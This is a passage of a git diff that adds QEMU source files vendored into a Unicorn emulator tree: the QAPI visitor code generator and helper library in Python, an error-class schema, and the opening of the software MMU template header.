&(*obj)->%(c_prefix)shas_%(c_name)s, "%(name)s", &err); +if (!err && (*obj)->%(prefix)shas_%(c_name)s) { +''', + c_prefix=c_var(field_prefix), prefix=field_prefix, + c_name=c_var(argname), name=argname) + push_indent() + + if structured: + ret += mcgen(''' +visit_type_%(full_name)s_field_%(c_name)s(m, obj, &err); +''', + full_name=full_name, c_name=c_var(argname)) + else: + ret += mcgen(''' +visit_type_%(type)s(m, &(*obj)->%(c_prefix)s%(c_name)s, "%(name)s", &err); +''', + c_prefix=c_var(field_prefix), prefix=field_prefix, + type=type_name(argentry), c_name=c_var(argname), + name=argname) + + if optional: + pop_indent() + ret += mcgen(''' +} +''') + ret += mcgen(''' +if (err) { + goto out; +} +''') + + pop_indent() + if re.search('^ *goto out\\;', ret, re.MULTILINE): + ret += mcgen(''' + +out: +''') + ret += mcgen(''' + error_propagate(errp, err); +} +''') + return ret + + +def generate_visit_struct_body(field_prefix, name, members): + ret = mcgen(''' + Error *err = NULL; + +''') + + if not field_prefix: + full_name = name + else: + full_name = "%s_%s" % (field_prefix, name) + + if len(field_prefix): + ret += mcgen(''' + visit_start_struct(m, NULL, "", "%(name)s", 0, &err); +''', + name=name) + else: + ret += mcgen(''' + visit_start_struct(m, (void **)obj, "%(name)s", name, sizeof(%(name)s), &err); +''', + name=name) + + ret += mcgen(''' + if (!err) { + if (*obj) { + visit_type_%(name)s_fields(m, obj, errp); + } + visit_end_struct(m, &err); + } + error_propagate(errp, err); +''', + name=full_name) + + return ret + +def generate_visit_struct(expr): + + name = expr['type'] + members = expr['data'] + base = expr.get('base') + + ret = generate_visit_struct_fields(name, "", "", members, base) + + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ +''', + name=name) + + ret += generate_visit_struct_body("", name, members) + + ret += mcgen(''' +} +''') + return ret + +def generate_visit_list(name, members): + return mcgen(''' + +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp) +{ + Error *err = NULL; + GenericList *i, **prev; + + visit_start_list(m, name, &err); + if (err) { + goto out; + } + + for (prev = (GenericList **)obj; + !err && (i = visit_next_list(m, prev, &err)) != NULL; + prev = &i) { + %(name)sList *native_i = (%(name)sList *)i; + visit_type_%(name)s(m, &native_i->value, NULL, &err); + } + + error_propagate(errp, err); + err = NULL; + visit_end_list(m, &err); +out: + error_propagate(errp, err); +} +''', + name=name) + +def generate_visit_enum(name, members): + return mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s *obj, const char *name, Error **errp) +{ + visit_type_enum(m, (int *)obj, %(name)s_lookup, "%(name)s", name, errp); +} +''', + name=name) + +def generate_visit_anon_union(name, members): + ret = mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_implicit_struct(m, (void**) obj, sizeof(%(name)s), &err); + if (err) { + goto out; + } + visit_get_next_type(m, (int*) &(*obj)->kind, %(name)s_qtypes, name, &err); + if (err) { + goto out_end; + } + switch ((*obj)->kind) { +''', + name=name) + + # For anon union, always use the default enum type automatically generated + # as "'%sKind' % (name)" + disc_type = '%sKind' % (name) + + for key in members: + assert (members[key] in builtin_types + or find_struct(members[key]) + or find_union(members[key]) + or find_enum(members[key])), "Invalid anonymous union member" + + enum_full_value = generate_enum_full_value(disc_type, key) + ret += mcgen(''' + case %(enum_full_value)s: + visit_type_%(c_type)s(m, &(*obj)->%(c_name)s, name, &err); + break; +''', + enum_full_value = enum_full_value, + c_type = type_name(members[key]), + c_name = c_fun(key)) + + ret += mcgen(''' + default: + abort(); + } +out_end: + error_propagate(errp, err); + err = NULL; + visit_end_implicit_struct(m, &err); +out: + error_propagate(errp, err); +} +''') + + return ret + + +def generate_visit_union(expr): + + name = expr['union'] + members = expr['data'] + + base = expr.get('base') + discriminator = expr.get('discriminator') + + if discriminator == {}: + assert not base + return generate_visit_anon_union(name, members) + + enum_define = discriminator_find_enum_define(expr) + if enum_define: + # Use the enum type as discriminator + ret = "" + disc_type = enum_define['enum_name'] + else: + # There will always be a discriminator in the C switch code, by default it + # is an enum type generated silently as "'%sKind' % (name)" + ret = generate_visit_enum('%sKind' % name, members.keys()) + disc_type = '%sKind' % (name) + + if base: + base_fields = find_struct(base)['data'] + if discriminator: + base_fields = base_fields.copy() + del base_fields[discriminator] + ret += generate_visit_struct_fields(name, "", "", base_fields) + + if discriminator: + for key in members: + ret += generate_visit_implicit_struct(members[key]) + + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp) +{ + Error *err = NULL; + + visit_start_struct(m, (void **)obj, "%(name)s", name, sizeof(%(name)s), &err); + if (err) { + goto out; + } + if (*obj) { +''', + name=name) + + if base: + ret += mcgen(''' + visit_type_%(name)s_fields(m, obj, &err); + if (err) { + goto out_obj; + } +''', + name=name) + + if not discriminator: + disc_key = "type" + else: + disc_key = discriminator + ret += mcgen(''' + visit_type_%(disc_type)s(m, &(*obj)->kind, "%(disc_key)s", &err); + if (err) { + goto out_obj; + } + if (!visit_start_union(m, !!(*obj)->data, &err) || err) { + goto out_obj; + } + switch ((*obj)->kind) { +''', + disc_type = disc_type, + disc_key = disc_key) + + for key in members: + if not discriminator: + fmt = 'visit_type_%(c_type)s(m, &(*obj)->%(c_name)s, "data", &err);' + else: + fmt = 'visit_type_implicit_%(c_type)s(m, &(*obj)->%(c_name)s, &err);' + + enum_full_value = generate_enum_full_value(disc_type, key) + ret += mcgen(''' + case %(enum_full_value)s: + ''' + fmt + ''' + break; +''', + enum_full_value = enum_full_value, + c_type=type_name(members[key]), + c_name=c_fun(key)) + + ret += mcgen(''' + default: + abort(); + } +out_obj: + error_propagate(errp, err); + err = NULL; + visit_end_union(m, !!(*obj)->data, &err); + error_propagate(errp, err); + err = NULL; + } + visit_end_struct(m, &err); +out: + error_propagate(errp, err); +} +''') + + return ret + +def generate_declaration(name, members, genlist=True, builtin_type=False): + ret = "" + if not builtin_type: + ret += mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s **obj, const char *name, Error **errp); +''', + name=name) + + if genlist: + ret += mcgen(''' +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp); +''', + name=name) + + return ret + +def generate_enum_declaration(name, members, genlist=True): + ret = "" + if genlist: + ret += mcgen(''' +void visit_type_%(name)sList(Visitor *m, %(name)sList **obj, const char *name, Error **errp); +''', + name=name) + + return ret + +def generate_decl_enum(name, members, genlist=True): + return mcgen(''' + +void visit_type_%(name)s(Visitor *m, %(name)s *obj, const char *name, Error **errp); +''', + name=name) + +try: + opts, args = getopt.gnu_getopt(sys.argv[1:], "chbp:i:o:", + ["source", "header", "builtins", "prefix=", + "input-file=", "output-dir="]) +except getopt.GetoptError as err: + print(str(err)) + sys.exit(1) + +input_file = "" +output_dir = "" +prefix = "" +c_file = 'qapi-visit.c' +h_file = 'qapi-visit.h' + +do_c = False +do_h = False +do_builtins = False + +for o, a in opts: + if o in ("-p", "--prefix"): + prefix = a + elif o in ("-i", "--input-file"): + input_file = a + elif o in ("-o", "--output-dir"): + output_dir = a + "/" + elif o in ("-c", "--source"): + do_c = True + elif o in ("-h", "--header"): + do_h = True + elif o in ("-b", "--builtins"): + do_builtins = True + +if not do_c and not do_h: + do_c = True + do_h = True + +c_file = output_dir + prefix + c_file +h_file = output_dir + prefix + h_file + +try: + os.makedirs(output_dir) +except os.error as e: + if e.errno != errno.EEXIST: + raise + +def maybe_open(really, name, opt): + if really: + return open(name, opt) + else: + try: + import StringIO + return StringIO.StringIO() + except ImportError: + from io import StringIO + return StringIO() + +fdef = maybe_open(do_c, c_file, 'w') +fdecl = maybe_open(do_h, h_file, 'w') + +fdef.write(mcgen(''' +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#include "qemu-common.h" +#include "%(header)s" +''', + header=basename(h_file))) + +fdecl.write(mcgen(''' +/* THIS FILE IS AUTOMATICALLY GENERATED, DO NOT MODIFY */ + +/* + * schema-defined QAPI visitor functions + * + * Copyright IBM, Corp. 2011 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + * + */ + +#ifndef %(guard)s +#define %(guard)s + +#include "qapi/visitor.h" +#include "%(prefix)sqapi-types.h" + +''', + prefix=prefix, guard=guardname(h_file))) + +exprs = parse_schema(input_file) + +# to avoid header dependency hell, we always generate declarations +# for built-in types in our header files and simply guard them +fdecl.write(guardstart("QAPI_VISIT_BUILTIN_VISITOR_DECL")) +for typename in builtin_types: + fdecl.write(generate_declaration(typename, None, genlist=True, + builtin_type=True)) +fdecl.write(guardend("QAPI_VISIT_BUILTIN_VISITOR_DECL")) + +# ...this doesn't work for cases where we link in multiple objects that +# have the functions defined, so we use -b option to provide control +# over these cases +if do_builtins: + for typename in builtin_types: + fdef.write(generate_visit_list(typename, None)) + +for expr in exprs: + if 'type' in expr: + ret = generate_visit_struct(expr) + ret += generate_visit_list(expr['type'], expr['data']) + fdef.write(ret) + + ret = generate_declaration(expr['type'], expr['data']) + fdecl.write(ret) + elif 'union' in expr: + ret = generate_visit_union(expr) + ret += generate_visit_list(expr['union'], expr['data']) + fdef.write(ret) + + enum_define = discriminator_find_enum_define(expr) + ret = "" + if not enum_define: + ret = generate_decl_enum('%sKind' % expr['union'], + expr['data'].keys()) + ret += generate_declaration(expr['union'], expr['data']) + fdecl.write(ret) + elif 'enum' in expr: + ret = generate_visit_list(expr['enum'], expr['data']) + ret += generate_visit_enum(expr['enum'], expr['data']) + fdef.write(ret) + + ret = generate_decl_enum(expr['enum'], expr['data']) + ret += generate_enum_declaration(expr['enum'], expr['data']) + fdecl.write(ret) + +fdecl.write(''' +#endif +''') + +fdecl.flush() +fdecl.close() + +fdef.flush() +fdef.close() diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py new file mode 100644 index 0000000..429f211 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi.py @@ -0,0 +1,605 @@ +# +# QAPI helper library +# +# Copyright IBM, Corp. 2011 +# Copyright (c) 2013 Red Hat Inc. +# +# Authors: +# Anthony Liguori +# Markus Armbruster +# +# This work is licensed under the terms of the GNU GPL, version 2. +# See the COPYING file in the top-level directory. + +import re +from ordereddict import OrderedDict +import os +import sys + +try: + basestring +except NameError: + basestring = str + +builtin_types = [ + 'str', 'int', 'number', 'bool', + 'int8', 'int16', 'int32', 'int64', + 'uint8', 'uint16', 'uint32', 'uint64' +] + +builtin_type_qtypes = { + 'str': 'QTYPE_QSTRING', + 'int': 'QTYPE_QINT', + 'number': 'QTYPE_QFLOAT', + 'bool': 'QTYPE_QBOOL', + 'int8': 'QTYPE_QINT', + 'int16': 'QTYPE_QINT', + 'int32': 'QTYPE_QINT', + 'int64': 'QTYPE_QINT', + 'uint8': 'QTYPE_QINT', + 'uint16': 'QTYPE_QINT', + 'uint32': 'QTYPE_QINT', + 'uint64': 'QTYPE_QINT', +} + +def error_path(parent): + res = "" + while parent: + res = ("In file included from %s:%d:\n" % (parent['file'], + parent['line'])) + res + parent = parent['parent'] + return res + +class QAPISchemaError(Exception): + def __init__(self, schema, msg): + self.input_file = schema.input_file + self.msg = msg + self.col = 1 + self.line = schema.line + for ch in schema.src[schema.line_pos:schema.pos]: + if ch == '\t': + self.col = (self.col + 7) % 8 + 1 + else: + self.col += 1 + self.info = schema.parent_info + + def __str__(self): + return error_path(self.info) + \ + "%s:%d:%d: %s" % (self.input_file, self.line, self.col, self.msg) + +class QAPIExprError(Exception): + def __init__(self, expr_info, msg): + self.info = expr_info + self.msg = msg + + def __str__(self): + return error_path(self.info['parent']) + \ + "%s:%d: %s" % (self.info['file'], self.info['line'], self.msg) + +class QAPISchema: + + def __init__(self, fp, input_relname=None, include_hist=[], + previously_included=[], parent_info=None): + """ include_hist is a stack used to detect inclusion cycles + previously_included is a global state used to avoid multiple + inclusions of the same file""" + input_fname = os.path.abspath(fp.name) + if input_relname is None: + input_relname = fp.name + self.input_dir = os.path.dirname(input_fname) + self.input_file = input_relname + self.include_hist = include_hist + [(input_relname, input_fname)] + previously_included.append(input_fname) + self.parent_info = parent_info + self.src = fp.read() + if self.src == '' or self.src[-1] != '\n': + self.src += '\n' + self.cursor = 0 + self.line = 1 + self.line_pos = 0 + self.exprs = [] + self.accept() + + while self.tok != None: + expr_info = {'file': input_relname, 'line': self.line, 'parent': self.parent_info} + expr = self.get_expr(False) + if isinstance(expr, dict) and "include" in expr: + if len(expr) != 1: + raise QAPIExprError(expr_info, "Invalid 'include' directive") + include = expr["include"] + if not isinstance(include, str): + raise QAPIExprError(expr_info, + 'Expected a file name (string), got: %s' + % include) + include_path = os.path.join(self.input_dir, include) + for elem in self.include_hist: + if include_path == elem[1]: + raise QAPIExprError(expr_info, "Inclusion loop for %s" + % include) + # skip multiple include of the same file + if include_path in previously_included: + continue + try: + fobj = open(include_path, 'r') + except IOError as e: + raise QAPIExprError(expr_info, + '%s: %s' % (e.strerror, include)) + exprs_include = QAPISchema(fobj, include, self.include_hist, + previously_included, expr_info) + self.exprs.extend(exprs_include.exprs) + else: + expr_elem = {'expr': expr, + 'info': expr_info} + self.exprs.append(expr_elem) + + def accept(self): + while True: + self.tok = self.src[self.cursor] + self.pos = self.cursor + self.cursor += 1 + self.val = None + + if self.tok == '#': + self.cursor = self.src.find('\n', self.cursor) + elif self.tok in ['{', '}', ':', ',', '[', ']']: + return + elif self.tok == "'": + string = '' + esc = False + while True: + ch = self.src[self.cursor] + self.cursor += 1 + if ch == '\n': + raise QAPISchemaError(self, + 'Missing terminating "\'"') + if esc: + string += ch + esc = False + elif ch == "\\": + esc = True + elif ch == "'": + self.val = string + return + else: + string += ch + elif self.tok == '\n': + if self.cursor == len(self.src): + self.tok = None + return + self.line += 1 + self.line_pos = self.cursor + elif not self.tok.isspace(): + raise QAPISchemaError(self, 'Stray "%s"' % self.tok) + + def get_members(self): + expr = OrderedDict() + if self.tok == '}': + self.accept() + return expr + if self.tok != "'": + raise QAPISchemaError(self, 'Expected string or "}"') + while True: + key = self.val + self.accept() + if self.tok != ':': + raise QAPISchemaError(self, 'Expected ":"') + self.accept() + if key in expr: + raise QAPISchemaError(self, 'Duplicate key "%s"' % key) + expr[key] = self.get_expr(True) + if self.tok == '}': + self.accept() + return expr + if self.tok != ',': + raise QAPISchemaError(self, 'Expected "," or "}"') + self.accept() + if self.tok != "'": + raise QAPISchemaError(self, 'Expected string') + + def get_values(self): + expr = [] + if self.tok == ']': + self.accept() + return expr + if not self.tok in [ '{', '[', "'" ]: + raise QAPISchemaError(self, 'Expected "{", "[", "]" or string') + while True: + expr.append(self.get_expr(True)) + if self.tok == ']': + self.accept() + return expr + if self.tok != ',': + raise QAPISchemaError(self, 'Expected "," or "]"') + self.accept() + + def get_expr(self, nested): + if self.tok != '{' and not nested: + raise QAPISchemaError(self, 'Expected "{"') + if self.tok == '{': + self.accept() + expr = self.get_members() + elif self.tok == '[': + self.accept() + expr = self.get_values() + elif self.tok == "'": + expr = self.val + self.accept() + else: + raise QAPISchemaError(self, 'Expected "{", "[" or string') + return expr + +def find_base_fields(base): + base_struct_define = find_struct(base) + if not base_struct_define: + return None + return base_struct_define['data'] + +# Return the discriminator enum define if discriminator is specified as an +# enum type, otherwise return None. +def discriminator_find_enum_define(expr): + base = expr.get('base') + discriminator = expr.get('discriminator') + + if not (discriminator and base): + return None + + base_fields = find_base_fields(base) + if not base_fields: + return None + + discriminator_type = base_fields.get(discriminator) + if not discriminator_type: + return None + + return find_enum(discriminator_type) + +def check_event(expr, expr_info): + params = expr.get('data') + if params: + for argname, argentry, optional, structured in parse_args(params): + if structured: + raise QAPIExprError(expr_info, + "Nested structure define in event is not " + "supported, event '%s', argname '%s'" + % (expr['event'], argname)) + +def check_union(expr, expr_info): + name = expr['union'] + base = expr.get('base') + discriminator = expr.get('discriminator') + members = expr['data'] + + # If the object has a member 'base', its value must name a complex type. + if base: + base_fields = find_base_fields(base) + if not base_fields: + raise QAPIExprError(expr_info, + "Base '%s' is not a valid type" + % base) + + # If the union object has no member 'discriminator', it's an + # ordinary union. + if not discriminator: + enum_define = None + + # Else if the value of member 'discriminator' is {}, it's an + # anonymous union. + elif discriminator == {}: + enum_define = None + + # Else, it's a flat union. + else: + # The object must have a member 'base'. + if not base: + raise QAPIExprError(expr_info, + "Flat union '%s' must have a base field" + % name) + # The value of member 'discriminator' must name a member of the + # base type. + discriminator_type = base_fields.get(discriminator) + if not discriminator_type: + raise QAPIExprError(expr_info, + "Discriminator '%s' is not a member of base " + "type '%s'" + % (discriminator, base)) + enum_define = find_enum(discriminator_type) + # Do not allow string discriminator + if not enum_define: + raise QAPIExprError(expr_info, + "Discriminator '%s' must be of enumeration " + "type" % discriminator) + + # Check every branch + for (key, value) in members.items(): + # If this named member's value names an enum type, then all members + # of 'data' must also be members of the enum type. + if enum_define and not key in enum_define['enum_values']: + raise QAPIExprError(expr_info, + "Discriminator value '%s' is not found in " + "enum '%s'" % + (key, enum_define["enum_name"])) + # Todo: add checking for values. Key is checked as above, value can be + # also checked here, but we need more functions to handle array case. + +def check_exprs(schema): + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'union' in expr: + check_union(expr, expr_elem['info']) + if 'event' in expr: + check_event(expr, expr_elem['info']) + +def parse_schema(input_file): + try: + schema = QAPISchema(open(input_file, "r")) + except (QAPISchemaError, QAPIExprError) as e: + print >>sys.stderr, e + exit(1) + + exprs = [] + + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'enum' in expr: + add_enum(expr['enum'], expr['data']) + elif 'union' in expr: + add_union(expr) + elif 'type' in expr: + add_struct(expr) + exprs.append(expr) + + # Try again for hidden UnionKind enum + for expr_elem in schema.exprs: + expr = expr_elem['expr'] + if 'union' in expr: + if not discriminator_find_enum_define(expr): + add_enum('%sKind' % expr['union']) + + try: + check_exprs(schema) + except QAPIExprError as e: + print >>sys.stderr, e + exit(1) + + return exprs + +def parse_args(typeinfo): + if isinstance(typeinfo, basestring): + struct = find_struct(typeinfo) + assert struct != None + typeinfo = struct['data'] + + for member in typeinfo: + argname = member + argentry = typeinfo[member] + optional = False + structured = False + if member.startswith('*'): + argname = member[1:] + optional = True + if isinstance(argentry, OrderedDict): + structured = True + yield (argname, argentry, optional, structured) + +def de_camel_case(name): + new_name = '' + for ch in name: + if ch.isupper() and new_name: + new_name += '_' + if ch == '-': + new_name += '_' + else: + new_name += ch.lower() + return new_name + +def camel_case(name): + new_name = '' + first = True + for ch in name: + if ch in ['_', '-']: + first = True + elif first: + new_name += ch.upper() + first = False + else: + new_name += ch.lower() + return new_name + +def c_var(name, protect=True): + # ANSI X3J11/88-090, 3.1.1 + c89_words = set(['auto', 'break', 'case', 'char', 'const', 'continue', + 'default', 'do', 'double', 'else', 'enum', 'extern', 'float', + 'for', 'goto', 'if', 'int', 'long', 'register', 'return', + 'short', 'signed', 'sizeof', 'static', 'struct', 'switch', + 'typedef', 'union', 'unsigned', 'void', 'volatile', 'while']) + # ISO/IEC 9899:1999, 6.4.1 + c99_words = set(['inline', 'restrict', '_Bool', '_Complex', '_Imaginary']) + # ISO/IEC 9899:2011, 6.4.1 + c11_words = set(['_Alignas', '_Alignof', '_Atomic', '_Generic', '_Noreturn', + '_Static_assert', '_Thread_local']) + # GCC http://gcc.gnu.org/onlinedocs/gcc-4.7.1/gcc/C-Extensions.html + # excluding _.* + gcc_words = set(['asm', 'typeof']) + # C++ ISO/IEC 14882:2003 2.11 + cpp_words = set(['bool', 'catch', 'class', 'const_cast', 'delete', + 'dynamic_cast', 'explicit', 'false', 'friend', 'mutable', + 'namespace', 'new', 'operator', 'private', 'protected', + 'public', 'reinterpret_cast', 'static_cast', 'template', + 'this', 'throw', 'true', 'try', 'typeid', 'typename', + 'using', 'virtual', 'wchar_t', + # alternative representations + 'and', 'and_eq', 'bitand', 'bitor', 'compl', 'not', + 'not_eq', 'or', 'or_eq', 'xor', 'xor_eq']) + # namespace pollution: + polluted_words = set(['unix', 'errno']) + if protect and (name in c89_words | c99_words | c11_words | gcc_words | cpp_words | polluted_words): + return "q_" + name + return name.replace('-', '_').lstrip("*") + +def c_fun(name, protect=True): + return c_var(name, protect).replace('.', '_') + +def c_list_type(name): + return '%sList' % name + +def type_name(name): + if type(name) == list: + return c_list_type(name[0]) + return name + +enum_types = [] +struct_types = [] +union_types = [] + +def add_struct(definition): + global struct_types + struct_types.append(definition) + +def find_struct(name): + global struct_types + for struct in struct_types: + if struct['type'] == name: + return struct + return None + +def add_union(definition): + global union_types + union_types.append(definition) + +def find_union(name): + global union_types + for union in union_types: + if union['union'] == name: + return union + return None + +def add_enum(name, enum_values = None): + global enum_types + enum_types.append({"enum_name": name, "enum_values": enum_values}) + +def find_enum(name): + global enum_types + for enum in enum_types: + if enum['enum_name'] == name: + return enum + return None + +def is_enum(name): + return find_enum(name) != None + +eatspace = '\033EATSPACE.' + +# A special suffix is added in c_type() for pointer types, and it's +# stripped in mcgen(). So please notice this when you check the return +# value of c_type() outside mcgen(). +def c_type(name, is_param=False): + if name == 'str': + if is_param: + return 'const char *' + eatspace + return 'char *' + eatspace + + elif name == 'int': + return 'int64_t' + elif (name == 'int8' or name == 'int16' or name == 'int32' or + name == 'int64' or name == 'uint8' or name == 'uint16' or + name == 'uint32' or name == 'uint64'): + return name + '_t' + elif name == 'size': + return 'uint64_t' + elif name == 'bool': + return 'bool' + elif name == 'number': + return 'double' + elif type(name) == list: + return '%s *%s' % (c_list_type(name[0]), eatspace) + elif is_enum(name): + return name + elif name == None or len(name) == 0: + return 'void' + elif name == name.upper(): + return '%sEvent *%s' % (camel_case(name), eatspace) + else: + return '%s *%s' % (name, eatspace) + +def is_c_ptr(name): + suffix = "*" + eatspace + return c_type(name).endswith(suffix) + +def genindent(count): + ret = "" + for i in range(count): + ret += " " + return ret + +indent_level = 0 + +def push_indent(indent_amount=4): + global indent_level + indent_level += indent_amount + +def pop_indent(indent_amount=4): + global indent_level + indent_level -= indent_amount + +def cgen(code, **kwds): + indent = genindent(indent_level) + lines = code.split('\n') + lines = map(lambda x: indent + x, lines) + return '\n'.join(lines) % kwds + '\n' + +def mcgen(code, **kwds): + raw = cgen('\n'.join(code.split('\n')[1:-1]), **kwds) + return re.sub(re.escape(eatspace) + ' *', '', raw) + +def basename(filename): + return filename.split("/")[-1] + +def guardname(filename): + guard = basename(filename).rsplit(".", 1)[0] + for substr in [".", " ", "-"]: + guard = guard.replace(substr, "_") + return guard.upper() + '_H' + +def guardstart(name): + return mcgen(''' + +#ifndef %(name)s +#define %(name)s + +''', + name=guardname(name)) + +def guardend(name): + return mcgen(''' + +#endif /* %(name)s */ + +''', + name=guardname(name)) + +# ENUMName -> ENUM_NAME, EnumName1 -> ENUM_NAME1 +# ENUM_NAME -> ENUM_NAME, ENUM_NAME1 -> ENUM_NAME1, ENUM_Name2 -> ENUM_NAME2 +# ENUM24_Name -> ENUM24_NAME +def _generate_enum_string(value): + c_fun_str = c_fun(value, False) + if value.isupper(): + return c_fun_str + + new_name = '' + l = len(c_fun_str) + for i in range(l): + c = c_fun_str[i] + # When c is upper and no "_" appears before, do more checks + if c.isupper() and (i > 0) and c_fun_str[i - 1] != "_": + # Case 1: next string is lower + # Case 2: previous string is digit + if (i < (l - 1) and c_fun_str[i + 1].islower()) or \ + c_fun_str[i - 1].isdigit(): + new_name += '_' + new_name += c + return new_name.lstrip('_').upper() + +def generate_enum_full_value(enum_name, enum_value): + abbrev_string = _generate_enum_string(enum_name) + value_string = _generate_enum_string(enum_value) + return "%s_%s" % (abbrev_string, value_string) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json new file mode 100644 index 0000000..c87eac4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/scripts/qapi/common.json @@ -0,0 +1,30 @@ +# -*- Mode: Python -*- +# +# QAPI common definitions + +## +# @ErrorClass +# +# QEMU error classes +# +# @GenericError: this is used for errors that don't require a specific error +# class. This should be the default case for most errors +# +# @CommandNotFound: the requested command has not been found +# +# @DeviceEncrypted: the requested operation can't be fulfilled because the +# selected device is encrypted +# +# @DeviceNotActive: a device has failed to be become active +# +# @DeviceNotFound: the requested device has not been found +# +# @KVMMissingCap: the requested operation can't be fulfilled because a +# required KVM capability is missing +# +# Since: 1.2 +## +{ 'enum': 'ErrorClass', + 'data': [ 'GenericError', 'CommandNotFound', 'DeviceEncrypted', + 'DeviceNotActive', 'DeviceNotFound', 'KVMMissingCap' ] } + diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h b/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h new file mode 100644 index 0000000..3e8fa9f --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/softmmu_template.h @@ -0,0 +1,1091 @@ +/* + * Software MMU support + * + * Generate helpers used by TCG for qemu_ld/st ops and code load + * functions. + * + * Included from target op helpers and exec.c. + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +/* Modified for Unicorn Engine by Nguyen Anh Quynh, 2015 */ + +#include "qemu/timer.h" +#include "exec/address-spaces.h" +#include "exec/memory.h" +#include "uc_priv.h" + +#define DATA_SIZE (1 << SHIFT) + +#if DATA_SIZE == 8 +#define SUFFIX q +#define LSUFFIX q +#define SDATA_TYPE int64_t +#define DATA_TYPE uint64_t +#elif DATA_SIZE == 4 +#define SUFFIX l +#define LSUFFIX l +#define SDATA_TYPE int32_t +#define DATA_TYPE uint32_t +#elif DATA_SIZE == 2 +#define SUFFIX w +#define LSUFFIX uw +#define SDATA_TYPE int16_t +#define DATA_TYPE uint16_t +#elif DATA_SIZE == 1 +#define SUFFIX b +#define LSUFFIX ub +#define SDATA_TYPE int8_t +#define DATA_TYPE uint8_t +#else +#error unsupported data size +#endif + + +/* For the benefit of TCG generated code, we want to avoid the complication + of ABI-specific return type promotion and always return a value extended + to the register size of the host. This is tcg_target_long, except in the + case of a 32-bit host and 64-bit data, and for that we always have + uint64_t. Don't bother with this widened value for SOFTMMU_CODE_ACCESS. */ +#if defined(SOFTMMU_CODE_ACCESS) || DATA_SIZE == 8 +# define WORD_TYPE DATA_TYPE +# define USUFFIX SUFFIX +#else +# define WORD_TYPE tcg_target_ulong +# define USUFFIX glue(u, SUFFIX) +# define SSUFFIX glue(s, SUFFIX) +#endif + +#ifdef SOFTMMU_CODE_ACCESS +#define READ_ACCESS_TYPE MMU_INST_FETCH +#define ADDR_READ addr_code +#else +#define READ_ACCESS_TYPE MMU_DATA_LOAD +#define ADDR_READ addr_read +#endif + +#if DATA_SIZE == 8 +# define BSWAP(X) bswap64(X) +#elif DATA_SIZE == 4 +# define BSWAP(X) bswap32(X) +#elif DATA_SIZE == 2 +# define BSWAP(X) bswap16(X) +#else +# define BSWAP(X) (X) +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +# define TGT_BE(X) (X) +# define TGT_LE(X) BSWAP(X) +#else +# define TGT_BE(X) BSWAP(X) +# define TGT_LE(X) (X) +#endif + +#if DATA_SIZE == 1 +# define helper_le_ld_name glue(glue(helper_ret_ld, USUFFIX), MMUSUFFIX) +# define helper_be_ld_name helper_le_ld_name +# define helper_le_lds_name glue(glue(helper_ret_ld, SSUFFIX), MMUSUFFIX) +# define helper_be_lds_name helper_le_lds_name +# define helper_le_st_name glue(glue(helper_ret_st, SUFFIX), MMUSUFFIX) +# define helper_be_st_name helper_le_st_name +#else +# define helper_le_ld_name glue(glue(helper_le_ld, USUFFIX), MMUSUFFIX) +# define helper_be_ld_name glue(glue(helper_be_ld, USUFFIX), MMUSUFFIX) +# define helper_le_lds_name glue(glue(helper_le_ld, SSUFFIX), MMUSUFFIX) +# define helper_be_lds_name glue(glue(helper_be_ld, SSUFFIX), MMUSUFFIX) +# define helper_le_st_name glue(glue(helper_le_st, SUFFIX), MMUSUFFIX) +# define helper_be_st_name glue(glue(helper_be_st, SUFFIX), MMUSUFFIX) +#endif + +#ifdef TARGET_WORDS_BIGENDIAN +# define helper_te_ld_name helper_be_ld_name +# define helper_te_st_name helper_be_st_name +#else +# define helper_te_ld_name helper_le_ld_name +# define helper_te_st_name helper_le_st_name +#endif + +/* macro to check the victim tlb */ +#define VICTIM_TLB_HIT(ty) \ + /* we are about to do a page table walk. our last hope is the \ + * victim tlb. try to refill from the victim tlb before walking the \ + * page table. */ \ + int vidx; \ + hwaddr tmpiotlb; \ + CPUTLBEntry tmptlb; \ + for (vidx = CPU_VTLB_SIZE-1; vidx >= 0; --vidx) { \ + if (env->tlb_v_table[mmu_idx][vidx].ty == (addr & TARGET_PAGE_MASK)) {\ + /* found entry in victim tlb, swap tlb and iotlb */ \ + tmptlb = env->tlb_table[mmu_idx][index]; \ + env->tlb_table[mmu_idx][index] = 